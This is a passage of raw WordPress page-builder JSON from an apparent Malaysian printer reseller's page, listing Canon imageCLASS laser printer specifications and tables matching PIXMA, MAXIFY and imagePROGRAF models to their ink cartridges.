MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 